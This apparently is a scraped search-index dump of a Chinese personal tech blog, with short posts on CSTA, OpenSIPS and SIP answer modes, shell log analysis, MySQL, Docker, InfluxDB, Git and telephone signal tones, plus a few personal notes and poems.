规范化呼叫模型和行为 完成服务、事件定义 规范化标准 3. CSTA 标准的进化史 阶段 1 (发布于 June ’92) 40 特性, 66 页 (服务定义) 专注于呼叫控制 阶段 2 (发布于 Dec. ’94) 77 特性, 145 页 (服务定义) I/O \u0026amp; 语音单元服务, 更多呼叫控制服务 阶段 3 - CSTA Phase II Features \u0026amp; versit CTI Technology 发布于 Dec. ‘98 136 特性, 650 页 (服务定义) 作为 ISO 标准发布于 July 2000 发布 CSTA XML (ECMA-323) June 2004 发布 “Using CSTA with Voice Browsers” (TR/85) Dec. 
02 发布 CSTA WSDL (ECMA-348) June 2004 June 2004: 发布对象模型 TR/88 June 2004: 发布 “Using CSTA for SIP Phone User Agents (uaCSTA)” TR/87 June 2004: 发布 “Application Session Services” (ECMA-354) June 2005: 发布 “WS-Session: WSDL for ECMA-354”(ECMA-366) December 2005 : 发布 “Management Notification and Computing FunctionServices” December 2005 : Session Management, Event Notification, Amendements for ECMA-348” (TR/90) December 2006 : Published new editions of ECMA-269, ECMA-323, ECMA-348 4. CSTA 标准文档 5. CSTA 标准扩展 新的特性可以被加入标准通过发布新版本的标准 新的参数,新的值可以被加入通过发布新版本的标准 未来的新版本必须下向后兼容 具体的实施可以增加属性通过 CSTA 自带的扩展机制(e.g. ONS – One Number Service) 6. CSTA 操作模型 CSTA 操作模型由计算域和转换域组成,是 CSTA 定义在两个域之间的接口 CSTA 标准规定了消息(服务以及事件上报),还有与之相关的行为 计算域是 CSTA 程序的宿主环境,用来与转换域交互与控制 转换域 - CSTA 模型提供抽象层,程序可以观测并控制的。转换渔包括一些对象例如 CSTA 呼叫,设备,链接。 7. CSTA 操作模型:呼叫,设备,链接 相关说明是的的的的\n8. 参考 CSTAoverview CSTA_introduction_and_overview ","permalink":"https://wdd.js.org/opensips/ch1/csta-call-model/","summary":"1. 内容概要 CSTA 协议与标准概述 CSTA OpenScape 语音架构概述 2. CSTA 协议标准 2.1. 什么是 CSTA ? CSTA:电脑支持通讯程序(Computer Supported TelecommunicationsApplications) 基本的呼叫模型在 1992 建立,后来随着行业发展,呼叫模型也被加强和扩展,例如新的协议等等 CSTA 是一个应用层接口,用来监控呼叫,设备和网络 CSTA 创建了一个通讯程序的抽象层: CSTA 并不依赖任何底层的信令协议 E.g.H.323,SIP,Analog,T1,ISDN,etc. CSTA 并不要求用户必须使用某些设备 E.g.intelligentendpoints,low-function/stimulusdevices,SIPSignalingmodels-3PCC vs. Peer/Peer 适用不同的操作模式 第三方呼叫控制 一方呼叫控制 CSTA 的设计目标是为了提高各种 CSTA 实现之间的移植性 规范化呼叫模型和行为 完成服务、事件定义 规范化标准 3. CSTA 标准的进化史 阶段 1 (发布于 June ’92) 40 特性, 66 页 (服务定义) 专注于呼叫控制 阶段 2 (发布于 Dec. 
’94) 77 特性, 145 页 (服务定义) I/O \u0026amp; 语音单元服务, 更多呼叫控制服务 阶段 3 - CSTA Phase II Features \u0026amp; versit CTI Technology 发布于 Dec.","title":"CSTA 呼叫模型简介"},{"content":"test.log\n2019-1010-1920 192.345.23.3 cause:\u0026#34;AAA\u0026#34; type:\u0026#34;A\u0026#34; loginIn 2019-1010-1920 192.345.23.1 cause:\u0026#34;BBB\u0026#34; type:\u0026#34;A\u0026#34; loginIn 2019-1010-1920 192.345.23.3 cause:\u0026#34;AAA\u0026#34; type:\u0026#34;S\u0026#34; loginIn 2019-1010-1920 192.345.23.1 cause:\u0026#34;BBJ\u0026#34; type:\u0026#34;A\u0026#34; loginIn 按列分割 提取第三列\n日志列数比较少或则要提取的字段比较靠前时,优先使用 awk。当然 cut 也可以做到。\n比如输出日志的第三列\nawk \u0026#39;{print $3}\u0026#39; test.log // $3表示第三列 cut -d \u0026#34; \u0026#34; -f3 test.log // -f3指定第三列, -d用来指定分割符 正则提取 提取 cause 字段的原因值?\n2019-1010-1920 192.345.23.3 cause:\u0026#34;AAA\u0026#34; type:\u0026#34;A\u0026#34; loginIn 2019-1010-1920 192.345.23.1 type:\u0026#34;A\u0026#34; loginIn cause:\u0026#34;BBB\u0026#34; 2019-1010-1920 192.345.23.3 cause:\u0026#34;AAA\u0026#34; type:\u0026#34;S\u0026#34; loginIn 2019-1010-1920 192.345.23.1 type:\u0026#34;A\u0026#34; cause:\u0026#34;BBJ\u0026#34; loginIn 当要提取的内容不在同一列时,往往就无法用cut或者awk就按列提取。最好用的方式是用 grep 的正则提取。\n好像 grep 不支持捕获分组,所以只能提取出出 cause:\u0026ldquo;AAA\u0026rdquo;,而无法直接提取出 AAA\nE 表示使用正则 o 表示只显示匹配到的内容 \u0026gt; grep -Eo \u0026#39;cause:\u0026#34;.*?\u0026#34;\u0026#39; test.log cause:\u0026#34;AAA\u0026#34; cause:\u0026#34;BBB\u0026#34; cause:\u0026#34;AAA\u0026#34; cause:\u0026#34;BBJ\u0026#34; 统计 对输出的关键词进行统计,并按照升序或者降序排列。\n将关键词按照列或者按照正则提取出来之后,首先要进行sort排序, 然后再进行uniq去重。\n不进行排序就直接去重,统计的值就不准确。因为 uniq 去重只能去除连续的相同字符串。不是连续的字符串,则会统计多次。\n下面例子:非连续的 cause:\u0026ldquo;AAA\u0026rdquo;,没有被合并在一起计数\n// bad grep -Eo \u0026#39;cause:\u0026#34;.*?\u0026#34;\u0026#39; test.log | uniq -c 1 cause:\u0026#34;AAA\u0026#34; 1 cause:\u0026#34;BBB\u0026#34; 1 cause:\u0026#34;AAA\u0026#34; 1 cause:\u0026#34;BBJ\u0026#34; // good AAA 被正确统计了 grep -Eo \u0026#39;cause:\u0026#34;.*?\u0026#34;\u0026#39; test.log | sort | uniq -c 2 
cause:\u0026#34;AAA\u0026#34; 1 cause:\u0026#34;BBB\u0026#34; 1 cause:\u0026#34;BBJ\u0026#34; 对统计值排序 sort 默认的排序是按照字典排序, 可以使用-n 参数让其按照数值大小排序。\nn 按照数值排序 r 取反。sort 按照数值排序是,默认是升序,如果想要结果降序,那么需要-r -k -k 可以指定按照某列的数值顺序排序,如-k1,1(指定第一列), -k2,2(指定第二列)。如果不指定-k 参数,那么一般默认第一列。 // 升序排序 grep -Eo \u0026#39;cause:\u0026#34;.*?\u0026#34;\u0026#39; test.log | sort |uniq -c | sort -n 1 cause:\u0026#34;BBB\u0026#34; 1 cause:\u0026#34;BBJ\u0026#34; 2 cause:\u0026#34;AAA\u0026#34; // 降序排序 grep -Eo \u0026#39;cause:\u0026#34;.*?\u0026#34;\u0026#39; test.log | sort |uniq -c | sort -nr 2 cause:\u0026#34;AAA\u0026#34; 1 cause:\u0026#34;BBJ\u0026#34; 1 cause:\u0026#34;BBB\u0026#34; ","permalink":"https://wdd.js.org/shell/grep-awk-sort/","summary":"test.log\n2019-1010-1920 192.345.23.3 cause:\u0026#34;AAA\u0026#34; type:\u0026#34;A\u0026#34; loginIn 2019-1010-1920 192.345.23.1 cause:\u0026#34;BBB\u0026#34; type:\u0026#34;A\u0026#34; loginIn 2019-1010-1920 192.345.23.3 cause:\u0026#34;AAA\u0026#34; type:\u0026#34;S\u0026#34; loginIn 2019-1010-1920 192.345.23.1 cause:\u0026#34;BBJ\u0026#34; type:\u0026#34;A\u0026#34; loginIn 按列分割 提取第三列\n日志列数比较少或则要提取的字段比较靠前时,优先使用 awk。当然 cut 也可以做到。\n比如输出日志的第三列\nawk \u0026#39;{print $3}\u0026#39; test.log // $3表示第三列 cut -d \u0026#34; \u0026#34; -f3 test.log // -f3指定第三列, -d用来指定分割符 正则提取 提取 cause 字段的原因值?\n2019-1010-1920 192.345.23.3 cause:\u0026#34;AAA\u0026#34; type:\u0026#34;A\u0026#34; loginIn 2019-1010-1920 192.345.23.1 type:\u0026#34;A\u0026#34; loginIn cause:\u0026#34;BBB\u0026#34; 2019-1010-1920 192.345.23.3 cause:\u0026#34;AAA\u0026#34; type:\u0026#34;S\u0026#34; loginIn 2019-1010-1920 192.345.23.1 type:\u0026#34;A\u0026#34; cause:\u0026#34;BBJ\u0026#34; loginIn 当要提取的内容不在同一列时,往往就无法用cut或者awk就按列提取。最好用的方式是用 grep 
的正则提取。","title":"awk、grep、cut、sort、uniq简单命令玩转日志分析与统计"},{"content":"https://winmerge.org/?lang=en\nWinMerge-2.16.4-Setup.exe.zip\n","permalink":"https://wdd.js.org/posts/2019/10/zo8dx2/","summary":"https://winmerge.org/?lang=en\nWinMerge-2.16.4-Setup.exe.zip","title":"windows上免费的文本对比工具"},{"content":"route_tree表中需要增加carrier\nid carrier 0 default ","permalink":"https://wdd.js.org/opensips/ch7/without-default-carrier/","summary":"route_tree表中需要增加carrier\nid carrier 0 default ","title":"ERROR:carrierroute:carrier_tree_fixup: default_carrier not found"},{"content":"Step 1: Install Required PackagesFirstly we need to make sure that we have installed required packages on your system. Use following command to install required packages before compiling Git source.\n# yum install curl-devel expat-devel gettext-devel openssl-devel zlib-devel # yum install gcc perl-ExtUtils-MakeMaker Step 2: Uninstall old Git RPMNow remove any prior installation of Git through RPM file or Yum package manager. If your older version is also compiled through source, then skip this step.\n# yum remove git Step 3: Download and Compile Git SourceDownload git source code from kernel git or simply use following command to download Git 2.5.3.\n# cd /usr/src # wget https://www.kernel.org/pub/software/scm/git/git-2.5.3.tar.gz # tar xzf git-2.5.3.tar.gz After downloading and extracting Git source code, Use following command to compile source code.\n# cd git-2.5.3 # make prefix=/usr/local/git all # make prefix=/usr/local/git install # echo \u0026#39;pathmunge /usr/local/git/bin/\u0026#39; \u0026gt; /etc/profile.d/git.sh # chmod +x /etc/profile.d/git.sh # source /etc/bashrc Step 4. Check Git VersionOn completion of above steps, you have successfully install Git in your system. 
Use the following command to check the git version\n# git --version git version 2.5.3 I also wanted to add that the \u0026ldquo;Getting Started\u0026rdquo; guide at the GIT website also includes instructions on how to download and compile it yourself:\n","permalink":"https://wdd.js.org/posts/2019/10/gxkb91/","summary":"Step 1: Install Required PackagesFirstly we need to make sure that we have installed required packages on your system. Use following command to install required packages before compiling Git source.\n# yum install curl-devel expat-devel gettext-devel openssl-devel zlib-devel # yum install gcc perl-ExtUtils-MakeMaker Step 2: Uninstall old Git RPMNow remove any prior installation of Git through RPM file or Yum package manager. If your older version is also compiled through source, then skip this step.","title":"手工安装git最新版"},{"content":"有些项目,文档写的不是很清楚,很多地方都需要摸着石头过河,在此写下自己的一点心得体会。\n后悔药 哪怕是改动一行代码,也要创建一个新的分支。如果发现前方有无法绕行的故障,你将会庆幸自己给自己留下退路。\n不要把自己逼到死角,永远给自己留下一个B计划。\n小碎步 不要大段重构,要小步慢走。尽量减少发生问题的点。在一本书中找错别字很难,但是在一行文字中找错别字就非常容易了。\n勿猜测 当你不知道某个函数如何使用时,不要去猜测,而应该去看官方文档是如何讲解这个函数的。\n","permalink":"https://wdd.js.org/posts/2019/10/bl933p/","summary":"有些项目,文档写的不是很清楚,很多地方都需要摸着石头过河,在此写下自己的一点心得体会。\n后悔药 哪怕是改动一行代码,也要创建一个新的分支。如果发现前方有无法绕行的故障,你将会庆幸自己给自己留下退路。\n不要把自己逼到死角,永远给自己留下一个B计划。\n小碎步 不要大段重构,要小步慢走。尽量减少发生问题的点。在一本书中找错别字很难,但是在一行文字中找错别字就非常容易了。\n勿猜测 当你不知道某个函数如何使用时,不要去猜测,而应该去看官方文档是如何讲解这个函数的。","title":"如何面对未知的项目"},{"content":"一个人喝粥太淡,两个人电话粥太甜。回忆似水流年,翘首如花美眷。对着微信聊天,凌晨了也没有觉得晚。窗外的月亮很圆,就像你那双明亮的眼。说一声晚安,道一声再见,我的梦中是有你的春天。\n","permalink":"https://wdd.js.org/posts/2019/10/an4am1/","summary":"一个人喝粥太淡,两个人电话粥太甜。回忆似水流年,翘首如花美眷。对着微信聊天,凌晨了也没有觉得晚。窗外的月亮很圆,就像你那双明亮的眼。说一声晚安,道一声再见,我的梦中是有你的春天。","title":"一个人喝粥太淡"},{"content":"你有邮箱吗?如果你有的话,那么当我不在你身边的时候,我会每天给你写一封信,告诉你,我今天遇见的的人,告诉你,我身边发生的事,告诉你,当你不在我身边时,我有多想你\n","permalink":"https://wdd.js.org/posts/2019/10/tgn9th/","summary":"你有邮箱吗?如果你有的话,那么当我不在你身边的时候,我会每天给你写一封信,告诉你,我今天遇见的的人,告诉你,我身边发生的事,告诉你,当你不在我身边时,我有多想你","title":"你有邮箱吗?"},{"content":"表复制 # 不跨数据库 insert into 
subscriber_copy(id, username) select id, username from subscriber # 跨数据库 需要在表名前加上数据库名 insert into wdd.test(id, username) select id, username from opensips.subscriber 调整表结构 增加字段 ALTER TABLE test ADD `username` char(64) not null default \u0026#39;\u0026#39; ","permalink":"https://wdd.js.org/posts/2019/10/nhrhfr/","summary":"表复制 # 不跨数据库 insert into subscriber_copy(id, username) select id, username from subscriber # 跨数据库 需要在表名前加上数据库名 insert into wdd.test(id, username) select id, username from opensips.subscriber 调整表结构 增加字段 ALTER TABLE test ADD `username` char(64) not null default \u0026#39;\u0026#39; ","title":"MySql表复制 与 调整字段"},{"content":"表wdd_a 表wdd_b\n不使用where子句生成的表的数是两个表行数的积,其字段的字段两个表的拼接\n查询的行数 = 表a的行数 x 表b的行数\nSELECT * FROM `wdd_a` join `wdd_b` order by wdd_a.id 表联合不使用where子句,会存在两个问题\n查询出来的结果没有意义 产生大量的无用数据,例如1000行的表a联合1000行的表b,将会产生1000*1000行的结果 SELECT * FROM `wdd_a` join `wdd_b` where wdd_a.id = wdd_b.id 当使用表联合之后,产生的数据\n是有意义的 查询结果的行数一定比两张表的行数都要少 下面是一个复杂的例子,给表起了别名,另外也只抽取了部分字段\nSELECT `a`.`id` AS `id`, `a`.`caller_id_dpid` AS `caller_id_dpid`, `a`.`callee_id_dpid` AS `callee_id_dpid`, `a`.`trunk_group` AS `trunk_group`, `b`.`domain` AS `domain` FROM (`wj_route_group` `a` join `domain` `b`) where (`a`.`id` = `b`.`route_group_id`); ","permalink":"https://wdd.js.org/posts/2019/10/gdeknt/","summary":"表wdd_a 表wdd_b\n不使用where子句生成的表的数是两个表行数的积,其字段的字段两个表的拼接\n查询的行数 = 表a的行数 x 表b的行数\nSELECT * FROM `wdd_a` join `wdd_b` order by wdd_a.id 表联合不使用where子句,会存在两个问题\n查询出来的结果没有意义 产生大量的无用数据,例如1000行的表a联合1000行的表b,将会产生1000*1000行的结果 SELECT * FROM `wdd_a` join `wdd_b` where wdd_a.id = wdd_b.id 当使用表联合之后,产生的数据\n是有意义的 查询结果的行数一定比两张表的行数都要少 下面是一个复杂的例子,给表起了别名,另外也只抽取了部分字段\nSELECT `a`.`id` AS `id`, `a`.`caller_id_dpid` AS `caller_id_dpid`, `a`.`callee_id_dpid` AS `callee_id_dpid`, `a`.`trunk_group` AS `trunk_group`, `b`.`domain` AS `domain` FROM (`wj_route_group` `a` join `domain` `b`) where (`a`.`id` = `b`.`route_group_id`); ","title":"理解mysql 表连接"},{"content":"你何时结婚 玩纸牌者 梦 鲍尔夫人的肖像 呐喊 裸体 绿叶 半身像 加歇医生 
拿烟斗的男孩 老吉他手 红黄蓝的构成II 蒙德里安 镜前少女 神奈川冲浪 ","permalink":"https://wdd.js.org/posts/2019/10/cgr19x/","summary":"你何时结婚 玩纸牌者 梦 鲍尔夫人的肖像 呐喊 裸体 绿叶 半身像 加歇医生 拿烟斗的男孩 老吉他手 红黄蓝的构成II 蒙德里安 镜前少女 神奈川冲浪 ","title":"世界名画"},{"content":"刀耕火种:没有docker的时代 想想哪些没有docker时光, 我们是怎么玩linux的。\n首先你要先装一个vmware或者virtualbox, 然后再下载一个几个GB的ISO文件,然后一步两步三步的经过十几个步骤,终于装好了一个虚拟机。这其中的步骤,每一步都可能有几个坑在等你踩。\n六年前,也就是在2013的时候,docker出现了,这个新奇的东西,可以让你用一行命令运行一个各种linux的发行版。\ndocker run -it centos docker run -it debian 黑色裂变:docker时代 docker 官网上,有个对docker非常准确的定位:\nDocker: The Modern Platform for High-Velocity Innovation\n我觉得行英文很好理解,但是不好翻译,从中抽取三个一个最终要的关键词。\u0026ldquo;High-Velocty\u0026rdquo;,可以理解为加速,提速。\n那么docker让devops提速了多少呢?\n没有docker的时代,如果可以称为冷兵器时代的话,docker的出现,将devops带入了热兵器时代。\n我们不用再准备石头,木棍,不需要打磨兵器,我们唯一要做的事情,瞄准目标,扣动扳机。\n运筹帷幄:k8s时代 说实在的,我还没仔细去体味docker的时代时,就已经进入了k8s时代。k8s的出现,让我们可以不用管docker, 可以直接跳过docker, 直接学习k8s的概念与命令。\nk8s的好处就不再多少了,只说说它的缺点。\n资源消耗大:k8s单机版没什么意义,一般都是集群,你需要多台虚拟机 部署耗费精力:想要部署k8s,要部署几个配套的基础服务 k8s对于tcp服务支持很好,对于udp服务, 所以如果我们仅仅是需要一个环境,跑跑自己的代码,相比于k8s,docker无疑是最方便且便宜的选择。\n说实在的,我之前一直对docker没有全面的掌握,系统的学习,我将会在这个知识库里,系统的梳理docker相关的知识和实战经验。\n帝国烽烟:云原生时代 微服务 应用编排调度 容器化 面向API 参考 https://en.wikipedia.org/wiki/Docker,_Inc. 
https://thenewstack.io/10-key-attributes-of-cloud-native-applications/ https://jimmysong.io/kubernetes-handbook/cloud-native/cloud-native-definition.html https://www.redhat.com/en/topics/cloud-native-apps ","permalink":"https://wdd.js.org/posts/2019/10/nzpt8a/","summary":"刀耕火种:没有docker的时代 想想那些没有docker的时光, 我们是怎么玩linux的。\n首先你要先装一个vmware或者virtualbox, 然后再下载一个几个GB的ISO文件,然后一步两步三步的经过十几个步骤,终于装好了一个虚拟机。这其中的步骤,每一步都可能有几个坑在等你踩。\n六年前,也就是在2013的时候,docker出现了,这个新奇的东西,可以让你用一行命令运行各种linux发行版。\ndocker run -it centos docker run -it debian 黑色裂变:docker时代 docker 官网上,有个对docker非常准确的定位:\nDocker: The Modern Platform for High-Velocity Innovation\n我觉得这行英文很好理解,但是不好翻译,从中抽取一个最重要的关键词。\u0026ldquo;High-Velocity\u0026rdquo;,可以理解为加速,提速。\n那么docker让devops提速了多少呢?\n没有docker的时代,如果可以称为冷兵器时代的话,docker的出现,将devops带入了热兵器时代。\n我们不用再准备石头,木棍,不需要打磨兵器,我们唯一要做的事情,瞄准目标,扣动扳机。\n运筹帷幄:k8s时代 说实在的,我还没仔细去体味docker的时代时,就已经进入了k8s时代。k8s的出现,让我们可以不用管docker, 可以直接跳过docker, 直接学习k8s的概念与命令。\nk8s的好处就不再多说了,只说说它的缺点。\n资源消耗大:k8s单机版没什么意义,一般都是集群,你需要多台虚拟机 部署耗费精力:想要部署k8s,要部署几个配套的基础服务 k8s对于tcp服务支持很好,对于udp服务的支持则不够完善, 所以如果我们仅仅是需要一个环境,跑跑自己的代码,相比于k8s,docker无疑是最方便且便宜的选择。\n说实在的,我之前一直对docker没有全面的掌握,系统的学习,我将会在这个知识库里,系统的梳理docker相关的知识和实战经验。\n帝国烽烟:云原生时代 微服务 应用编排调度 容器化 面向API 参考 https://en.wikipedia.org/wiki/Docker,_Inc. 
https://thenewstack.io/10-key-attributes-of-cloud-native-applications/ https://jimmysong.io/kubernetes-handbook/cloud-native/cloud-native-definition.html https://www.redhat.com/en/topics/cloud-native-apps ","title":"虚拟化浪潮"},{"content":"创建数据库 curl -i -XPOST http://localhost:8086/query --data-urlencode \u0026#34;q=CREATE DATABASE testdb\u0026#34; 写数据到数据库 curl -i -XPOST \u0026#39;http://localhost:8086/write?db=mydb\u0026#39; --data-binary \u0026#39;cpu_load_short,host=server01,region=us-west value=0.64 1434055562000000000\u0026#39; 批量写入 output.txt\nnginx_second,tag=ip169 value=21 1592638800000000000 nginx_second,tag=ip169 value=32 1592638801000000000 nginx_second,tag=ip169 value=20 1592638802000000000 nginx_second,tag=ip169 value=11 1592638803000000000 curl -i -XPOST \u0026#39;http://localhost:8086/write?db=mydb\u0026#39; --data-binary @output.txt 参考 https://docs.influxdata.com/influxdb/v1.7/guides/writing_data/ ","permalink":"https://wdd.js.org/posts/2019/10/eqgykt/","summary":"创建数据库 curl -i -XPOST http://localhost:8086/query --data-urlencode \u0026#34;q=CREATE DATABASE testdb\u0026#34; 写数据到数据库 curl -i -XPOST \u0026#39;http://localhost:8086/write?db=mydb\u0026#39; --data-binary \u0026#39;cpu_load_short,host=server01,region=us-west value=0.64 1434055562000000000\u0026#39; 批量写入 output.txt\nnginx_second,tag=ip169 value=21 1592638800000000000 nginx_second,tag=ip169 value=32 1592638801000000000 nginx_second,tag=ip169 value=20 1592638802000000000 nginx_second,tag=ip169 value=11 1592638803000000000 curl -i -XPOST \u0026#39;http://localhost:8086/write?db=mydb\u0026#39; --data-binary @output.txt 参考 https://docs.influxdata.com/influxdb/v1.7/guides/writing_data/ ","title":"influxdb http操作"},{"content":"编辑这个文件 ~/.ssh/config 在顶部添加下边两行 Host * ServerAliveInterval=30 每隔30秒向服务端发送 no-op包\n","permalink":"https://wdd.js.org/posts/2019/10/swoxa5/","summary":"编辑这个文件 ~/.ssh/config 在顶部添加下边两行 Host * ServerAliveInterval=30 每隔30秒向服务端发送 no-op包","title":"ssh保持连接状态不断开"},{"content":"Notify 
使用notify消息,通知分机应答,这个notify一般发送在分机回180响应之后\nAnswer-mode Answer-Mode一般有两个值 Auto: UA收到INVITE之后,立即回200OK,没有180的过程 Manual: UA收到INVITE之后,等待用户手工点击应答 通常Answer-Mode还会跟着require, 表示某个应答方式如果不被允许,应当回403 Forbidden 作为响应。\nAnswer-Mode: Auto;require 和Answer-mode头类似的有个SIP头叫做:Priv-Answer-Mode,这个功能和Answer-Mode类似,但是它有个特点。\n如果UA设置了免打扰,Priv-Answer-Mode头会无视免打扰这个选项,强制让分机应答,这个头适合用于紧急呼叫。\n结论 如果要实现分机的自动应答,显然Answer-Mode的应答速度会更快。但是对于依赖180响应的系统,可能要考虑这种没有180响应的情况。\n要记住,在SIP消息里,对于UA来说,1xx的响应都是非必须的、可以缺少的。\n","permalink":"https://wdd.js.org/opensips/ch1/ua-answer-mode/","summary":"Notify 使用notify消息,通知分机应答,这个notify一般发送在分机回180响应之后\nAnswer-mode Answer-Mode一般有两个值 Auto: UA收到INVITE之后,立即回200OK,没有180的过程 Manual: UA收到INVITE之后,等待用户手工点击应答 通常Answer-Mode还会跟着require, 表示某个应答方式如果不被允许,应当回403 Forbidden 作为响应。\nAnswer-Mode: Auto;require 和Answer-mode头类似的有个SIP头叫做:Priv-Answer-Mode,这个功能和Answer-Mode类似,但是它有个特点。\n如果UA设置了免打扰,Priv-Answer-Mode头会无视免打扰这个选项,强制让分机应答,这个头适合用于紧急呼叫。\n结论 如果要实现分机的自动应答,显然Answer-Mode的应答速度会更快。但是对于依赖180响应的系统,可能要考虑这种没有180响应的情况。\n要记住,在SIP消息里,对于UA来说,1xx的响应都是非必须的、可以缺少的。","title":"UA应答模式的实现"},{"content":"前些天,有朋友推荐一部美剧《致命女人》,听着名字,觉得有点像特工或者犯罪系列的电视剧。\n看了第一集之后,才发现这个剧是讲述婚姻问题的美剧。\n一般情况下,我不喜欢看婚姻题材的影视。但是,任何事情都逃不过真相定律。\n","permalink":"https://wdd.js.org/posts/2019/09/zgwg91/","summary":"前些天,有朋友推荐一部美剧《致命女人》,听着名字,觉得有点像特工或者犯罪系列的电视剧。\n看了第一集之后,才发现这个剧是讲述婚姻问题的美剧。\n一般情况下,我不喜欢看婚姻题材的影视。但是,任何事情都逃不过真相定律。","title":"致命女人 Why Women Kill"},{"content":"git clean -n # 打印哪些文件将会被删除 git clean -f # 删除文件 git clean -fd # 删除文件和目录 参考 https://stackoverflow.com/questions/61212/how-to-remove-local-untracked-files-from-the-current-git-working-tree ","permalink":"https://wdd.js.org/posts/2019/09/vccx09/","summary":"git clean -n # 打印哪些文件将会被删除 git clean -f # 删除文件 git clean -fd # 删除文件和目录 参考 https://stackoverflow.com/questions/61212/how-to-remove-local-untracked-files-from-the-current-git-working-tree ","title":"git 删除未跟踪的文件"},{"content":"构造json $json(body) := \u0026#34;{}\u0026#34;; $json(body/time) = $time(%F %T-0300); $json(body/sipRequest) = 
“INVITE”; $json(body/ipIntruder) = $si; $json(body/destNum) = $rU; $json(body/userAgent) = $ua; $json(body/country)=$var(city); $json(body/location)=$var(latlon); $json(body/ipHost) = $Ri; 使用async rest_post写数据 async好像存在于2.1版本及其以上, 异步的好处是不会阻止脚本的继续执行 async(rest_post(\u0026#34;http://user:password@w.x.y.z:9200/opensips/1\u0026#34;, \u0026#34;$json(body)\u0026#34;, \u0026#34;$var(ctype)\u0026#34;, \u0026#34;$var(ct)\u0026#34;, \u0026#34;$var(rcode)\u0026#34;),resume) ","permalink":"https://wdd.js.org/opensips/ch3/elk/","summary":"构造json $json(body) := \u0026#34;{}\u0026#34;; $json(body/time) = $time(%F %T-0300); $json(body/sipRequest) = “INVITE”; $json(body/ipIntruder) = $si; $json(body/destNum) = $rU; $json(body/userAgent) = $ua; $json(body/country)=$var(city); $json(body/location)=$var(latlon); $json(body/ipHost) = $Ri; 使用async rest_post写数据 async好像存在于2.1版本及其以上, 异步的好处是不会阻止脚本的继续执行 async(rest_post(\u0026#34;http://user:password@w.x.y.z:9200/opensips/1\u0026#34;, \u0026#34;$json(body)\u0026#34;, \u0026#34;$var(ctype)\u0026#34;, \u0026#34;$var(ct)\u0026#34;, \u0026#34;$var(rcode)\u0026#34;),resume) ","title":"opensips日志写入elasticsearch"},{"content":" https://smallpdf.com https://www.pdfpai.com/pdf-to-powerpoint ","permalink":"https://wdd.js.org/posts/2019/09/wn0a02/","summary":" https://smallpdf.com https://www.pdfpai.com/pdf-to-powerpoint ","title":"pdf转ppt工具收集"},{"content":"特点分析 回铃音有以下特点\n回铃音是由运营商送给手机的,而不是由被叫送给主叫的。 回铃音的播放阶段是在被叫接听前播放,被叫一旦接听,回铃音则播放结束 回铃音一般是450Hz, 嘟一秒,停4秒,5秒一个周期 常见问题 听不到回铃音 【现象】打同一个号码,有些手机能听到回铃音,有些手机听不到回铃音【排查思路】\n有些手机volte开启后,可能会导致无回铃音,所以可以关闭volte试试 被叫的运营商,主叫手机的运营商 参考资料 https://zh.wikipedia.org/wiki/%E5%9B%9E%E9%93%83%E9%9F%B3 https://baike.baidu.com/item/%E5%9B%9E%E9%93%83%E9%9F%B3/1014322 http://www.it9000.cn/tech/CTI/signal.html ","permalink":"https://wdd.js.org/opensips/ch2/early-media/","summary":"特点分析 回铃音有以下特点\n回铃音是由运营商送给手机的,而不是由被叫送给主叫的。 回铃音的播放阶段是在被叫接听前播放,被叫一旦接听,回铃音则播放结束 回铃音一般是450Hz, 嘟一秒,停4秒,5秒一个周期 常见问题 听不到回铃音 
【现象】打同一个号码,有些手机能听到回铃音,有些手机听不到回铃音【排查思路】\n有些手机volte开启后,可能会导致无回铃音,所以可以关闭volte试试 被叫的运营商,主叫手机的运营商 参考资料 https://zh.wikipedia.org/wiki/%E5%9B%9E%E9%93%83%E9%9F%B3 https://baike.baidu.com/item/%E5%9B%9E%E9%93%83%E9%9F%B3/1014322 http://www.it9000.cn/tech/CTI/signal.html ","title":"回铃音"},{"content":"几种常用电话信号音的含义 信号频率:(450±25)HZ:拨号音、回铃音、忙音、长途通知音、空号音(950±25)HZ:催挂音\n拨号音 摘机后受话器中便有一种“嗡\u0026ndash;”的连续音,这种声音就是拨号音,它表示自动交换机或对方呼叫中心系统已经做好了接续准备,允许用户拨号\n回铃音 拨完被叫号,若听到“嘟\u0026ndash;嘟\u0026ndash;”的断续音(响1s,断4s),便是回铃音,表示被叫话机正在响铃,可静候接话;如果振铃超过10余次,仍无人讲话,说明对方无人接电话,应放好手柄稍后再拨。\n忙音 当主叫用户在拨号过程中或拨完被叫电话号码后,若听到“嘟、嘟、嘟……”的短促音(响0.35s,断0.35s),这就是忙音,表示线路已经被占满或被叫电话机正在使用\n长途通知音 当主叫用户和被叫用户正在进行市内通话时,听到“嘟、嘟、嘟……”的短促音(响0.2s,断0.2s,响0.2s,间歇0.6s),这便是长途电话通知音,表示有长途电话插入,提醒主被叫用户双方尽快结束市内通话,准备接听长途电话。\n空号音 当用户拨完号码后听到不等间隔断续信号音(重复3次0.1s响,0.1s断后,0.4s响0.4s断),这便是空号音,表示通知主叫用户所呼叫的被叫号码为空号或受限制的号码。\n催挂音 如果用户听到连续信号音,响度变化为5级,由低级逐步升高,则是催挂音。通知久不挂机的用户迅速挂机。\n参考 http://www.it9000.cn/tech/CTI/signal.html ","permalink":"https://wdd.js.org/opensips/ch2/early-media-type/","summary":"几种常用电话信号音的含义 信号频率:(450±25)HZ:拨号音、回铃音、忙音、长途通知音、空号音(950±25)HZ:催挂音\n拨号音 摘机后受话器中便有一种“嗡\u0026ndash;”的连续音,这种声音就是拨号音,它表示自动交换机或对方呼叫中心系统已经做好了接续准备,允许用户拨号\n回铃音 拨完被叫号,若听到“嘟\u0026ndash;嘟\u0026ndash;”的断续音(响1s,断4s),便是回铃音,表示被叫话机正在响铃,可静候接话;如果振铃超过10余次,仍无人讲话,说明对方无人接电话,应放好手柄稍后再拨。\n忙音 当主叫用户在拨号过程中或拨完被叫电话号码后,若听到“嘟、嘟、嘟……”的短促音(响0.35s,断0.35s),这就是忙音,表示线路已经被占满或被叫电话机正在使用\n长途通知音 当主叫用户和被叫用户正在进行市内通话时,听到“嘟、嘟、嘟……”的短促音(响0.2s,断0.2s,响0.2s,间歇0.6s),这便是长途电话通知音,表示有长途电话插入,提醒主被叫用户双方尽快结束市内通话,准备接听长途电话。\n空号音 当用户拨完号码后听到不等间隔断续信号音(重复3次0.1s响,0.1s断后,0.4s响0.4s断),这便是空号音,表示通知主叫用户所呼叫的被叫号码为空号或受限制的号码。\n催挂音 如果用户听到连续信号音,响度变化为5级,由低级逐步升高,则是催挂音。通知久不挂机的用户迅速挂机。\n参考 http://www.it9000.cn/tech/CTI/signal.html 